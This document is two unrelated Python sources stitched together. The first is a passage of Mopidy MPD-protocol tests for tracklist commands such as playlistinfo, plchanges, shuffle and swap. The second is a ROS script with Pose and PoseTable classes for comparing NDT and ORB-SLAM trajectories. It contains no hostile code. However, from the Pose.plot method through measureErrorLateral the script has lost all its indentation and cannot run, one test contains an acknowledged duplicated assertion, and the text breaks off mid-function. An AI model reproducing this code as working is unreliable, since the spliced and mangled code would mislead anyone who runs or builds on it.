        self.assertEqual(result, ['b', 'c', 'a', 'd', 'e', 'f'])
        self.assertInResponse('OK')

    def test_moveid(self):
        self.send_request('moveid "4" "2"')
        result = [t.name for t in self.core.tracklist.tracks.get()]
        self.assertEqual(result, ['a', 'b', 'e', 'c', 'd', 'f'])
        self.assertInResponse('OK')

    def test_moveid_with_tlid_not_found_in_tracklist_should_ack(self):
        self.send_request('moveid "9" "0"')
        self.assertEqualResponse(
            'ACK [50@0] {moveid} No such song')
class PlaylistFindCommandTest(protocol.BaseTestCase):
    """Protocol tests for ``playlistfind`` (only filename search works)."""

    def test_playlistfind(self):
        self.send_request('playlistfind "tag" "needle"')
        self.assertEqualResponse('ACK [0@0] {playlistfind} Not implemented')

    def test_playlistfind_by_filename_not_in_tracklist(self):
        self.send_request('playlistfind "filename" "file:///dev/null"')
        self.assertEqualResponse('OK')

    def test_playlistfind_by_filename_without_quotes(self):
        self.send_request('playlistfind filename "file:///dev/null"')
        self.assertEqualResponse('OK')

    def test_playlistfind_by_filename_in_tracklist(self):
        track = Track(uri='dummy:///exists')
        self.backend.library.dummy_library = [track]
        self.core.tracklist.add(uris=[track.uri])
        self.send_request('playlistfind filename "dummy:///exists"')
        self.assertInResponse('file: dummy:///exists')
        self.assertInResponse('Id: 0')
        self.assertInResponse('Pos: 0')
        self.assertInResponse('OK')
class PlaylistIdCommandTest(BasePopulatedTracklistTestCase):
    """Protocol tests for ``playlistid``, with and without a song id."""

    def test_playlistid_without_songid(self):
        self.send_request('playlistid')
        self.assertInResponse('Title: a')
        self.assertInResponse('Title: b')
        self.assertInResponse('OK')

    def test_playlistid_with_songid(self):
        self.send_request('playlistid "1"')
        self.assertNotInResponse('Title: a')
        self.assertNotInResponse('Id: 0')
        self.assertInResponse('Title: b')
        self.assertInResponse('Id: 1')
        self.assertInResponse('OK')

    def test_playlistid_with_not_existing_songid_fails(self):
        self.send_request('playlistid "25"')
        self.assertEqualResponse('ACK [50@0] {playlistid} No such song')
class PlaylistInfoCommandTest(BasePopulatedTracklistTestCase):
    """Protocol tests for ``playlistinfo`` and the deprecated ``playlist``."""

    def test_playlist_returns_same_as_playlistinfo(self):
        with deprecation.ignore('mpd.protocol.current_playlist.playlist'):
            playlist_response = self.send_request('playlist')
        playlistinfo_response = self.send_request('playlistinfo')
        self.assertEqual(playlist_response, playlistinfo_response)

    def test_playlistinfo_without_songpos_or_range(self):
        self.send_request('playlistinfo')
        self.assertInResponse('Title: a')
        self.assertInResponse('Pos: 0')
        self.assertInResponse('Title: b')
        self.assertInResponse('Pos: 1')
        self.assertInResponse('Title: c')
        self.assertInResponse('Pos: 2')
        self.assertInResponse('Title: d')
        self.assertInResponse('Pos: 3')
        self.assertInResponse('Title: e')
        self.assertInResponse('Pos: 4')
        self.assertInResponse('Title: f')
        self.assertInResponse('Pos: 5')
        self.assertInResponse('OK')

    def test_playlistinfo_with_songpos(self):
        # Make the track's CPID not match the playlist position
        self.core.tracklist.tlid = 17
        self.send_request('playlistinfo "4"')
        self.assertNotInResponse('Title: a')
        self.assertNotInResponse('Pos: 0')
        self.assertNotInResponse('Title: b')
        self.assertNotInResponse('Pos: 1')
        self.assertNotInResponse('Title: c')
        self.assertNotInResponse('Pos: 2')
        self.assertNotInResponse('Title: d')
        self.assertNotInResponse('Pos: 3')
        self.assertInResponse('Title: e')
        self.assertInResponse('Pos: 4')
        self.assertNotInResponse('Title: f')
        self.assertNotInResponse('Pos: 5')
        self.assertInResponse('OK')

    def test_playlistinfo_with_negative_songpos_same_as_playlistinfo(self):
        response1 = self.send_request('playlistinfo "-1"')
        response2 = self.send_request('playlistinfo')
        self.assertEqual(response1, response2)

    def test_playlistinfo_with_open_range(self):
        self.send_request('playlistinfo "2:"')
        self.assertNotInResponse('Title: a')
        self.assertNotInResponse('Pos: 0')
        self.assertNotInResponse('Title: b')
        self.assertNotInResponse('Pos: 1')
        self.assertInResponse('Title: c')
        self.assertInResponse('Pos: 2')
        self.assertInResponse('Title: d')
        self.assertInResponse('Pos: 3')
        self.assertInResponse('Title: e')
        self.assertInResponse('Pos: 4')
        self.assertInResponse('Title: f')
        self.assertInResponse('Pos: 5')
        self.assertInResponse('OK')

    def test_playlistinfo_with_closed_range(self):
        self.send_request('playlistinfo "2:4"')
        self.assertNotInResponse('Title: a')
        self.assertNotInResponse('Title: b')
        self.assertInResponse('Title: c')
        self.assertInResponse('Title: d')
        self.assertNotInResponse('Title: e')
        self.assertNotInResponse('Title: f')
        self.assertInResponse('OK')

    def test_playlistinfo_with_too_high_start_of_range_returns_arg_error(self):
        self.send_request('playlistinfo "10:20"')
        self.assertEqualResponse('ACK [2@0] {playlistinfo} Bad song index')

    def test_playlistinfo_with_too_high_end_of_range_returns_ok(self):
        self.send_request('playlistinfo "0:20"')
        self.assertInResponse('OK')

    def test_playlistinfo_with_zero_returns_ok(self):
        self.send_request('playlistinfo "0"')
        self.assertInResponse('OK')
class PlaylistSearchCommandTest(protocol.BaseTestCase):
    """``playlistsearch`` is advertised but not implemented by mopidy."""

    def test_playlistsearch(self):
        self.send_request('playlistsearch "any" "needle"')
        self.assertEqualResponse('ACK [0@0] {playlistsearch} Not implemented')

    def test_playlistsearch_without_quotes(self):
        self.send_request('playlistsearch any "needle"')
        self.assertEqualResponse('ACK [0@0] {playlistsearch} Not implemented')
class PlChangeCommandTest(BasePopulatedTracklistTestCase):
    """Protocol tests for ``plchanges``/``plchangesposid`` versioned diffs."""

    def test_plchanges_with_lower_version_returns_changes(self):
        self.send_request('plchanges "0"')
        self.assertInResponse('Title: a')
        self.assertInResponse('Title: b')
        self.assertInResponse('Title: c')
        self.assertInResponse('OK')

    def test_plchanges_with_equal_version_returns_nothing(self):
        self.assertEqual(self.core.tracklist.version.get(), 1)
        self.send_request('plchanges "1"')
        self.assertNotInResponse('Title: a')
        self.assertNotInResponse('Title: b')
        self.assertNotInResponse('Title: c')
        self.assertInResponse('OK')

    def test_plchanges_with_greater_version_returns_nothing(self):
        self.assertEqual(self.core.tracklist.version.get(), 1)
        self.send_request('plchanges "2"')
        self.assertNotInResponse('Title: a')
        self.assertNotInResponse('Title: b')
        self.assertNotInResponse('Title: c')
        self.assertInResponse('OK')

    def test_plchanges_with_minus_one_returns_entire_playlist(self):
        self.send_request('plchanges "-1"')
        self.assertInResponse('Title: a')
        self.assertInResponse('Title: b')
        self.assertInResponse('Title: c')
        self.assertInResponse('OK')

    def test_plchanges_without_quotes_works(self):
        self.send_request('plchanges 0')
        self.assertInResponse('Title: a')
        self.assertInResponse('Title: b')
        self.assertInResponse('Title: c')
        self.assertInResponse('OK')

    def test_plchangesposid(self):
        self.send_request('plchangesposid "0"')
        tl_tracks = self.core.tracklist.tl_tracks.get()
        self.assertInResponse('cpos: 0')
        self.assertInResponse('Id: %d' % tl_tracks[0].tlid)
        # NOTE(review): 'cpos: 2' is asserted twice and 'cpos: 1' never is --
        # this looks like a copy/paste slip in the expectations; confirm
        # against actual plchangesposid output before changing.
        self.assertInResponse('cpos: 2')
        self.assertInResponse('Id: %d' % tl_tracks[1].tlid)
        self.assertInResponse('cpos: 2')
        self.assertInResponse('Id: %d' % tl_tracks[2].tlid)
        self.assertInResponse('OK')
# TODO: we only seem to be testing that don't touch the non shuffled region :/
class ShuffleCommandTest(BasePopulatedTracklistTestCase):
    """Protocol tests for ``shuffle``.

    Shuffling is random, so these tests only assert that the tracklist
    version bumped and that tracks OUTSIDE the shuffled range stay put.
    """

    def test_shuffle_without_range(self):
        version = self.core.tracklist.version.get()
        self.send_request('shuffle')
        self.assertLess(version, self.core.tracklist.version.get())
        self.assertInResponse('OK')

    def test_shuffle_with_open_range(self):
        version = self.core.tracklist.version.get()
        self.send_request('shuffle "4:"')
        self.assertLess(version, self.core.tracklist.version.get())
        result = [t.name for t in self.core.tracklist.tracks.get()]
        self.assertEqual(result[:4], ['a', 'b', 'c', 'd'])
        self.assertInResponse('OK')

    def test_shuffle_with_closed_range(self):
        version = self.core.tracklist.version.get()
        self.send_request('shuffle "1:3"')
        self.assertLess(version, self.core.tracklist.version.get())
        result = [t.name for t in self.core.tracklist.tracks.get()]
        self.assertEqual(result[:1], ['a'])
        self.assertEqual(result[3:], ['d', 'e', 'f'])
        self.assertInResponse('OK')
class SwapCommandTest(BasePopulatedTracklistTestCase):
    """Protocol tests for the MPD ``swap`` and ``swapid`` commands."""

    def test_swap(self):
        self.send_request('swap "1" "4"')
        result = [t.name for t in self.core.tracklist.tracks.get()]
        self.assertEqual(result, ['a', 'e', 'c', 'd', 'b', 'f'])
        self.assertInResponse('OK')

    def test_swapid(self):
        self.send_request('swapid "1" "4"')
        result = [t.name for t in self.core.tracklist.tracks.get()]
        self.assertEqual(result, ['a', 'e', 'c', 'd', 'b', 'f'])
        self.assertInResponse('OK')

    def test_swapid_with_first_id_unknown_should_ack(self):
        self.send_request('swapid "0" "8"')
        self.assertEqualResponse(
            'ACK [50@0] {swapid} No such song')

    def test_swapid_with_second_id_unknown_should_ack(self):
        self.send_request('swapid "8" "0"')
        self.assertEqualResponse(
            'ACK [50@0] {swapid} No such song')
| |
from __future__ import division
import numpy as np
import datetime
import rosbag
import rospy
from copy import copy, deepcopy
from exceptions import KeyError, ValueError
from segway_rmp.msg import SegwayStatusStamped
from geometry_msgs.msg import PoseStamped
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from math import cos, sin, tan, exp
from tf import transformations as trafo
# Input trajectory files: NDT localizer output vs. ORB-SLAM estimate.
ndtFName = '/home/sujiwo/ORB_SLAM/Data/20151106-1/ndt.csv'
orbFName = '/home/sujiwo/ORB_SLAM/Data/20151106-1/orb-slam.csv'
def ClosestPointInLine (PointA, PointB, pointChk, ifPointInLine=None):
    """Project pointChk onto the line through PointA and PointB.

    Returns the projected Pose (with pointChk's timestamp/orientation);
    when ifPointInLine is not None, also returns the projection parameter
    (a value in [0, 1] means the foot lies between A and B).
    """
    segment = PointB.coord() - PointA.coord()
    offset = pointChk.coord() - PointA.coord()
    # Scalar projection of `offset` onto `segment`, normalized by |segment|^2.
    param = np.dot(offset, segment) / np.dot(segment, segment)
    foot = PointA.coord() + segment * param
    projected = Pose(pointChk.timestamp,
                     foot[0], foot[1], foot[2],
                     pointChk.qx, pointChk.qy, pointChk.qz, pointChk.qw)
    if ifPointInLine is None:
        return projected
    return projected, param
class Pose :
    def __init__ (self, t=0, _x=0, _y=0, _z=0, _qx=0, _qy=0, _qz=0, _qw=1):
        """Build a pose from either an 8-sequence ``t`` or from scalars.

        EAFP: first try to unpack ``t`` as (timestamp, x, y, z, qx, qy,
        qz, qw); if ``t`` is a scalar (TypeError on indexing) or too short
        (IndexError), fall back to treating ``t`` as the timestamp and use
        the individual ``_x`` .. ``_qw`` arguments.
        """
        try:
            self.timestamp = t[0]
            self.x = t[1]
            self.y = t[2]
            self.z = t[3]
            self.qx = t[4]
            self.qy = t[5]
            self.qz = t[6]
            self.qw = t[7]
        except (TypeError, IndexError):
            self.timestamp = t
            self.x = _x
            self.y = _y
            self.z = _z
            self.qx = _qx
            self.qy = _qy
            self.qz = _qz
            self.qw = _qw
def plot (self, size=50, **kwargs):
return plt.scatter(self.x, self.y, s=size, linewidths=0, **kwargs)
@staticmethod
# RPY must be in Radian
def xyzEuler (x, y, z, roll, pitch, yaw, timestamp=0):
pose = Pose (timestamp, x, y, z)
qt = trafo.quaternion_from_euler(roll, pitch, yaw)
pose.qx = qt[0]
pose.qy = qt[1]
pose.qz = qt[2]
pose.qw = qt[3]
return pose
def quaternion (self):
return np.array([self.qx, self.qy, self.qz, self.qw])
def __str__ (self):
return "X={}, Y={}, Z={}, Qx={}, Qy={}, Qz={}, Qw={}".format(self.x, self.y, self.z, self.qx, self.qy, self.qz, self.qw)
def time (self):
return datetime.datetime.fromtimestamp(self.timestamp)
def offsetTime (self, t):
self.timestamp += t
def coord (self):
return np.array([self.x, self.y, self.z])
def rot (self):
return np.array([self.qx, self.qy, self.qz, self.qw])
def __sub__ (self, p1):
return np.array([self.x-p1.x, self.y-p1.y, self.z-p1.z])
# Only calculate movement, but does not overwrite the values
# currentTimestamp must be in second
def segwayMove (self, currentTimestamp, leftWheelVelocity, rightWheelVelocity, yawRate):
# this is minimum speed to consider yaw changes (ie. yaw damping)
minSpeed = 0.025
v = (leftWheelVelocity + rightWheelVelocity) / 2
dt = currentTimestamp - self.timestamp
# XXX: May need to change this line
if abs(v) > minSpeed:
w = yawRate #(yawRate+0.011)*0.98
else:
w = 0.0
x = self.x + v*cos(self.theta) * dt
y = self.y + v*sin(self.theta) * dt
theta = self.theta + w * dt
return x, y, theta
@staticmethod
def interpolate (pose1, pose2, ratio):
if (pose1.timestamp > pose2.timestamp) :
raise ValueError ("pose1 timestamp must be > pose2")
td = (pose2.timestamp - pose1.timestamp)
intpose = Pose(pose1.timestamp + ratio*td,
pose1.x + ratio*(pose2.x-pose1.x),
pose1.y + ratio*(pose2.y-pose1.y),
pose1.z + ratio*(pose2.z-pose1.z))
q1 = pose1.quaternion()
q2 = pose2.quaternion()
qInt = trafo.quaternion_slerp(q1, q2, ratio)
intpose.qx, intpose.qy, intpose.qz, intpose.qw = \
qInt[0], qInt[1], qInt[2], qInt[3]
return intpose
@staticmethod
def average (*poses):
avgpose = Pose()
xs = [p.x for p in poses]
ys = [p.y for p in poses]
zs = [p.z for p in poses]
avgpose.x = sum(xs) / len(poses)
avgpose.y = sum(ys) / len(poses)
avgpose.z = sum(zs) / len(poses)
avgpose.timestamp = np.average([p.timestamp for p in poses])
return avgpose
def publish (self, tfBroadCaster, frame1, frame2):
tfBroadCaster.sendTransform(
(self.x, self.y, self.z),
(self.qx, self.qy, self.qz, self.qw),
rospy.Time.from_sec(self.timestamp),
frame1, frame2
)
# Output euler angle in order of: Roll, Pitch, Yaw
def euler (self):
return np.array(trafo.euler_from_quaternion([self.qx, self.qy, self.qz, self.qw]))
def setRPY (self, roll, pitch, yaw):
pass
def distance (self, pose):
return np.linalg.norm([self.x-pose.x, self.y-pose.y, self.z-pose.z])
def inverse (self):
(qx, qy, qz, qw) = np.array([-self.qx, -self.qy, -self.qz, self.qw]) / np.linalg.norm([self.qx, self.qy, self.qz, self.qw])
return Pose(self.timestamp, -self.x, -self.y, -self.z, qx, qy, qz, qw)
def toMat4 (self):
mat4 = np.eye(4)
rotm = trafo.quaternion_matrix([self.qx, self.qy, self.qz, self.qw])
mat4[0:3,3] = (self.x, self.y, self.z)
mat4[0:3, 0:3] = rotm
return mat4
def toRotMat (self):
return trafo.quaternion_matrix([self.qx, self.qy, self.qz, self.qw])
def __mul__ (self, posev):
p = posev.apply(self)
p.timestamp = self.timestamp
return p
def __rmul__ (self, posev):
return self.apply(posev)
# ot * self
def apply (self, ot):
rotmat1 = self.toRotMat()
rotmat2 = ot.toRotMat()
q = trafo.quaternion_from_matrix(rotmat1.dot(rotmat2))
return Pose (self.timestamp,
rotmat1[0][0:3].dot([ot.x, ot.y, ot.z]) + self.x,
rotmat1[1][0:3].dot([ot.x, ot.y, ot.z]) + self.y,
rotmat1[2][0:3].dot([ot.x, ot.y, ot.z]) + self.z,
q[0], q[1], q[2], q[3])
def doApplyMe (self, ot):
p = self.apply(ot)
self.x = p.x
self.y = p.y
self.z = p.z
self.qx = p.qx
self.qy = p.qy
self.qz = p.qz
self.qw = p.qw
def measureErrorLateral (self, groundTruth, timeTolerance=0.1, useZ=False):
def doMeasureDistance (p, q, useZ):
if useZ :
return np.linalg.norm ([p.x-q.x, p.y-q.y, p.z-q.z], 2)
else :
return np.linalg.norm ([p.x-q.x, p.y-q.y], 2)
pMin, pMax = groundTruth.findNearPosesByTime (self, timeTolerance)
# XXX: I know this is Wrong
# if pMin is None or pMax is None:
# return 1000
if pMax is None:
return doMeasureDistance(self, pMin, useZ)
if pMin is None:
return doMeasureDistance(self, pMax, useZ)
# if (pMin is None) or (pMax is None) :
# return -2.0
pointChk, c = ClosestPointInLine(pMin, pMax, self, True)
# Ideal case
if c>=0.0 and c<=1.0:
return doMeasureDistance(pointChk, self, useZ)
# Bad case
elif c<0.0:
return doMeasureDistance(pMin, self, useZ)
# return -3.0
else:
return doMeasureDistance(pMax, self, useZ)
# return -4.0
class PoseTable :
    """Ordered collection of Pose objects, indexed both by insertion order
    (`table`) and by an integer key (`idList` maps key -> table position)."""

    def __init__ (self):
        self.table = []     # poses in insertion order
        self.idList = {}    # key -> index into self.table
        self.c = 0          # number of stored poses

    def __setitem__ (self, key, value):
        self.table.append (value)
        self.idList[key] = self.c
        self.c += 1

    def __getitem__ (self, key):
        return self.table[self.idList[key]]

    def __len__ (self):
        return len(self.table)

    def __iadd__ (self, offset):
        # Shift all pose timestamps by `offset` seconds.
        for pose in self.table :
            pose.offsetTime (offset)
        return self

    def __isub__ (self, offset):
        return self.__iadd__(-offset)

    def append (self, pose):
        """Append `pose` under the next free integer key."""
        self.table.append (pose)
        ckeys = self.idList.keys()
        if len(ckeys)==0 :
            ckey = -1
        else :
            ckey = max (ckeys)
        self.idList[ckey+1] = self.c
        self.c += 1

    def apply (self, poseX):
        """Transform every pose in place by poseX."""
        for pose in self.table:
            # doApplyMe mutates the pose and returns None; the old code's
            # re-assignment of its result was a no-op and has been dropped.
            pose.doApplyMe (poseX)

    def length (self, tolerance=0):
        """Total path length.  When `tolerance` (seconds) is given, pairs
        of consecutive poses further apart in time than the tolerance are
        treated as recording gaps and skipped."""
        totaldist = 0
        for p in range(1, len(self.table)):
            cpose = self.table[p]
            ppose = self.table[p-1]
            if tolerance>0 :
                if abs(ppose.timestamp - cpose.timestamp) > tolerance:
                    print('far')
                    continue
            totaldist += np.linalg.norm([cpose.x-ppose.x, cpose.y-ppose.y, cpose.z-ppose.z])
        return totaldist

    def lengths (self):
        """Per-segment Euclidean distances between consecutive poses."""
        dists = []
        for p in range(1, len(self.table)):
            cpose = self.table[p]
            ppose = self.table[p-1]
            dists.append (np.linalg.norm([cpose.x-ppose.x, cpose.y-ppose.y, cpose.z-ppose.z]))
        return dists

    def timeLengths (self):
        """Per-segment time differences between consecutive poses."""
        timeDists = []
        for p in range(1, len(self.table)):
            cpose = self.table[p]
            ppose = self.table[p-1]
            timeDists.append (abs(cpose.timestamp - ppose.timestamp))
        return timeDists

    def toArray (self, includeTimestamp=False):
        """Poses as an (N, 7) array, or (N, 8) with timestamps first."""
        if includeTimestamp :
            mlt = [[p.timestamp, p.x, p.y, p.z, p.qx, p.qy, p.qz, p.qw] for p in self.table]
        else :
            mlt = [[p.x, p.y, p.z, p.qx, p.qy, p.qz, p.qw] for p in self.table]
        return np.array(mlt)

    def findNearestByTime (self, pose, tolerance=0):
        """Nearest pose(s) to pose.timestamp.

        NOTE(review): inconsistent return type kept for compatibility —
        with tolerance > 0 this returns a *list* of candidates sorted by
        time difference, otherwise a single pose.  Raises KeyError when
        the timestamp is outside the table's span.
        """
        if (pose.timestamp < self.table[0].timestamp) :
            raise KeyError ("Timestamp less than table")
        if (pose.timestamp > self.table[self.c-1].timestamp) :
            raise KeyError ("Timestamp is outside table: " + str(pose.timestamp))
        candidates = set()
        i = 0
        # Scan forward to the first pose after the target time ...
        for p in range(len(self.table)) :
            i = p
            cpose = self.table[i]
            if (cpose.timestamp > pose.timestamp) :
                candidates.add(cpose)
                i-=1
                break
        # ... then walk backwards, collecting poses until one precedes it.
        while i!=0 :
            cpose = self.table[i]
            i -= 1
            candidates.add (cpose)
            if (cpose.timestamp < pose.timestamp) :
                candidates.add (cpose)
                break
        if (tolerance>0) :
            tcandidates=[]
            for c in candidates:
                c.tdif = abs(c.timestamp-pose.timestamp)
                if c.tdif <= tolerance:
                    tcandidates.append(c)
            return sorted (tcandidates, key=lambda pose: pose.tdif)
        return min(candidates, key=lambda p: abs(p.timestamp-pose.timestamp))

    def findNearPosesByTime (self, srcpose, tolerance=0.1):
        """Return (nearMin, nearMax): copies of the poses bracketing
        srcpose in time; either may be None.  Raises KeyError when
        srcpose.timestamp is outside the table's span."""
        if (srcpose.timestamp < self.table[0].timestamp) :
            raise KeyError ("Timestamp less than table")
        if (srcpose.timestamp > self.table[-1].timestamp) :
            raise KeyError ("Timestamp is outside table: " + str(srcpose.timestamp))
        nearMin = None
        nearMax = None
        for p in range(len(self)):
            i = p
            cpose = self.table[i]
            if (cpose.timestamp > srcpose.timestamp):
                nearMax = copy(cpose)
                break
        while i != 0 :
            cpose = self.table[i]
            i -= 1
            if (cpose.timestamp < srcpose.timestamp):
                nearMin = copy (cpose)
                break
        return (nearMin, nearMax)

    def interpolateByTime (self, srcpose, tolerance=0.1):
        """Interpolate a pose at srcpose.timestamp: linear for position,
        SLERP for orientation, between the two time-bracketing poses."""
        pmin, pmax = self.findNearPosesByTime (srcpose, tolerance)
        tRatio = (srcpose.timestamp - pmin.timestamp) / (pmax.timestamp - pmin.timestamp)
        pvmin = pmin.coord()
        pvmax = pmax.coord()
        posInt = pvmin + tRatio * (pvmax - pvmin)
        qInt = trafo.quaternion_slerp(pmin.quaternion(), pmax.quaternion(), tRatio)
        return Pose(srcpose.timestamp, posInt[0], posInt[1], posInt[2],
                    qInt[0], qInt[1], qInt[2], qInt[3])

    def interpolateByProjection (self, srcpose, tolerance=0.1):
        # TODO: unfinished — finds the bracketing poses but never projects.
        pmin, pmax = self.findNearPosesByTime (srcpose, tolerance)

    def findNearestInTime (self, timestamp, tolerance=0.1):
        """Nearest pose to `timestamp` within `tolerance` seconds, or None."""
        candidates = set()
        for p in self.table:
            if abs(p.timestamp - timestamp) < tolerance:
                candidates.add(p)
            if p.timestamp > timestamp:
                break
        if len(candidates)==0 :
            return None
        return min(candidates, key=lambda p: abs(p.timestamp-timestamp))

    def findNearestByDistance (self, pose, returnIdx=False, *args):
        """Nearest pose by position: the pose itself by default, or its
        table index when returnIdx is True."""
        if returnIdx==False :
            return min(self.table,
                       key=lambda p:
                       np.linalg.norm(pose.coord()-p.coord()))
        elif returnIdx==True :
            dist = np.array([np.linalg.norm(pose.coord()-p.coord()) for p in self.table])
            return np.argmin(dist)
        elif len(args)>0 :
            # NOTE(review): only reachable when returnIdx is neither True
            # nor False; looks vestigial — confirm before relying on it.
            posecoord = np.array([pose, returnIdx, args[0]])
            return min(self.table,
                       key=lambda p:
                       np.linalg.norm(posecoord-p.coord()))

    def last(self):
        return self.table[-1]

    @staticmethod
    def plotMulti (*tables):
        # TODO: unimplemented.
        pass

    def plot (self, col1, col2, **kwargs):
        """Plot toArray() column col1 against col2 (0->x, 1->y, 2->z, ...)."""
        array = self.toArray()
        return plt.plot(array[:,col1], array[:,col2], **kwargs)

    def plotRange (self, col1, col2, rangeFrom, rangeTo, **kwargs):
        """Like plot(), restricted to rows rangeFrom..rangeTo."""
        array = self.toArray()
        return plt.plot(array[rangeFrom:rangeTo, col1], array[rangeFrom:rangeTo, col2], **kwargs)

    def plotTimeToAxis (self, col):
        # Choosing columns: 1->X, 2->Y, 3->Z (column 0 is the timestamp).
        matr = self.toArray(True)
        return plt.plot(matr[:,0], matr[:,col])

    @staticmethod
    def loadCsv (filename):
        """Load poses from a whitespace-separated file whose rows are
        [timestamp, x, y, z, qx, qy, qz, qw]."""
        records = PoseTable ()
        for r in np.loadtxt(filename) :
            records.append (Pose (r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7]))
        return records

    @staticmethod
    def loadFromBagFile (filename, sourceFrameName=None, targetFrameName=None) :
        """Load poses from /tf messages in a ROS bag, optionally keeping
        only transforms from sourceFrameName to targetFrameName."""
        bagsrc = rosbag.Bag(filename, mode='r')
        i = 0
        bagRecord = PoseTable ()
        # Message timestamp is what was recorded by `rosbag record';
        # transform timestamp is what was reported by the publisher.
        for topic, msg, msgTimestamp in bagsrc.read_messages('/tf') :
            transform = msg.transforms[0].transform
            header = msg.transforms[0].header
            tfTimestamp = header.stamp
            child_frame_id = msg.transforms[0].child_frame_id
            if sourceFrameName is not None and targetFrameName is not None :
                if header.frame_id!=sourceFrameName or child_frame_id!=targetFrameName :
                    continue
            pose = Pose (tfTimestamp.to_sec(),
                         transform.translation.x, transform.translation.y, transform.translation.z,
                         transform.rotation.x, transform.rotation.y, transform.rotation.z, transform.rotation.w)
            pose.counter = i
            pose.msgTimestamp = msgTimestamp.to_sec()
            bagRecord[i] = pose
            i += 1
        return bagRecord

    @staticmethod
    def loadFromPoseStampedBag (filename, topicName=None):
        """Load poses from geometry_msgs/PoseStamped messages in a bag."""
        bagsrc = rosbag.Bag (filename, mode='r')
        poseRecord = PoseTable()
        for topic, msg, msgTimestamp in bagsrc.read_messages():
            if topicName is not None and topic != topicName :
                continue
            if msg._type != 'geometry_msgs/PoseStamped' :
                continue
            cpose = Pose(msgTimestamp.to_sec(), msg.pose.position.x, msg.pose.position.y, msg.pose.position.z,
                         msg.pose.orientation.x, msg.pose.orientation.y, msg.pose.orientation.z, msg.pose.orientation.w)
            poseRecord.append(cpose)
        return poseRecord

    @staticmethod
    def loadFromArray (msrc):
        """Build a table from an (N, 8) array; rows are sorted by their
        first column (timestamp) before insertion."""
        if msrc.shape[1] != 8 :
            raise ValueError ('Source has no timestamp')
        table = PoseTable ()
        for row in sorted(msrc, key=lambda r: r[0]):
            table.append(Pose(row))
        return table

    @staticmethod
    def getFrameList (filename):
        """List the distinct (from, to) transform pairs on a bag's /tf
        stream, with the time each pair first appears."""
        bagsrc = rosbag.Bag(filename, mode='r')
        frames = {}
        for topic, msg, timestamp in bagsrc.read_messages('/tf'):
            header = msg.transforms[0].header
            child_frame_id = msg.transforms[0].child_frame_id
            key = header.frame_id+child_frame_id
            if key not in frames :
                frames[key] = {'from':header.frame_id, 'to':child_frame_id, 'start':timestamp.to_sec()}
        return frames.values()

    def getAllInTimeRanges (self, targetPoses):
        """Copies of all poses whose timestamps fall inside targetPoses'
        overall time span."""
        matchInTime = PoseTable()
        p1 = targetPoses[0]
        p2 = targetPoses.last()
        for p in self.table:
            if p.timestamp >= p1.timestamp and p.timestamp<=p2.timestamp:
                matchInTime.append (copy (p))
        return matchInTime

    @staticmethod
    def compareErrorsByTime (poseTbl1, poseTbl2, useZ=True):
        """Positional error of each pose in poseTbl1 (source) against the
        time-nearest pose of poseTbl2 (ground truth).

        Returns a list of [timestamp, error] pairs.
        """
        errorVect = []
        i=0
        for pose in poseTbl1.table:
            try:
                nearp = poseTbl2.findNearestByTime(pose)
                if useZ :
                    errv = np.linalg.norm([pose.x-nearp.x, pose.y-nearp.y, pose.z-nearp.z], 2)
                else:
                    errv = np.linalg.norm([pose.x-nearp.x, pose.y-nearp.y], 2)
                errorVect.append([pose.timestamp, errv])
                i+=1
                print ("{} out of {}".format(i, len(poseTbl1)))
            except KeyError as e:
                # BUG FIX: was the Python-2-only statement `print e`, a
                # syntax error under Python 3 and inconsistent with the
                # call-style prints used elsewhere in this file.
                print(e)
        return errorVect

    @staticmethod
    def compareErrorsByDistance (poseTblSource, groundTruth, useZ=True):
        """Like compareErrorsByTime, but matches each source pose to the
        spatially nearest ground-truth pose."""
        errorVect = []
        i=0
        for pose in poseTblSource.table:
            try:
                nearp = groundTruth.findNearestByDistance(pose)
                if useZ :
                    errv = np.linalg.norm([pose.x-nearp.x, pose.y-nearp.y, pose.z-nearp.z], 2)
                else:
                    errv = np.linalg.norm([pose.x-nearp.x, pose.y-nearp.y], 2)
                errorVect.append([pose.timestamp, errv])
                i+=1
                print ("{} out of {}".format(i, len(poseTblSource)))
            except KeyError as e:
                # BUG FIX: was `print e` (Python 2 syntax); see above.
                print(e)
        return errorVect

    @staticmethod
    def compareLateralErrors (poseTblSource, groundTruth, tolerance=0.15, useZ=False):
        """Annotate every pose in poseTblSource with `.measuredError`, its
        lateral distance to the ground-truth path, or -1.0 when no
        time-bracketing ground truth exists."""
        i = 0
        for pose in poseTblSource.table:
            try:
                pose.measuredError = pose.measureErrorLateral (groundTruth, tolerance, useZ)
            except KeyError as e:
                pose.measuredError = -1.0
            i += 1
            print ("{} out of {}".format(i, len(poseTblSource)))

    @staticmethod
    def removeSpuriousPoints (poseTbl1):
        # XXX: Unfinished — currently returns an empty table.
        newposetbl = PoseTable()
        for pose in poseTbl1.table:
            pass
        return newposetbl

    def findBlankTime(self, timeTolerance=0.5):
        """Return [before, after] pose pairs around every recording gap
        longer than timeTolerance seconds."""
        blanks = []
        for p in range(1, len(self.table)):
            cpose = self.table[p]
            ppose = self.table[p-1]
            if abs(cpose.timestamp - ppose.timestamp) > timeTolerance:
                blanks.append([ppose, cpose])
        return blanks

    def lengthFrom2Pose (self, poseIndex1, poseIndex2):
        """Path length between two table indices (segments ending at
        poseIndex1+1 .. poseIndex2).  Returns None for non-int indices
        (behavior kept from the original implementation)."""
        if type(poseIndex1)==int :
            dist = 0.0
            for i in range(poseIndex1+1, poseIndex2+1):
                cpose = self.table[i]
                ppose = self.table[i-1]
                dist += np.linalg.norm([cpose.x-ppose.x, cpose.y-ppose.y, cpose.z-ppose.z], 2)
            return dist

    def lengthFrom2Times(self, time1, time2):
        """Path length between the poses nearest to two timestamps."""
        pose1 = self.findNearestInTime(time1, 0.25)
        idx1 = self.table.index(pose1)
        pose2 = self.findNearestInTime(time2, 0.25)
        idx2 = self.table.index(pose2)
        return self.lengthFrom2Pose (idx1, idx2)

    def subset (self, startIdx, stopIdx):
        """New table with poses startIdx..stopIdx inclusive (shared refs)."""
        poseTblSubset = PoseTable()
        for i in range(startIdx, stopIdx+1):
            poseTblSubset.append(self.table[i])
        return poseTblSubset

    def transform (self, dpose):
        # TODO: unimplemented.
        pass

    def findBlankLengthFromGroundTruth (self, groundTruthTbl):
        """Total ground-truth distance not covered by this table: before
        its first pose, after its last pose, and across internal gaps."""
        tolerance = 0.25
        # Blank distance before our first pose
        blankDistFront = 0
        if groundTruthTbl[0].timestamp < self.table[0].timestamp:
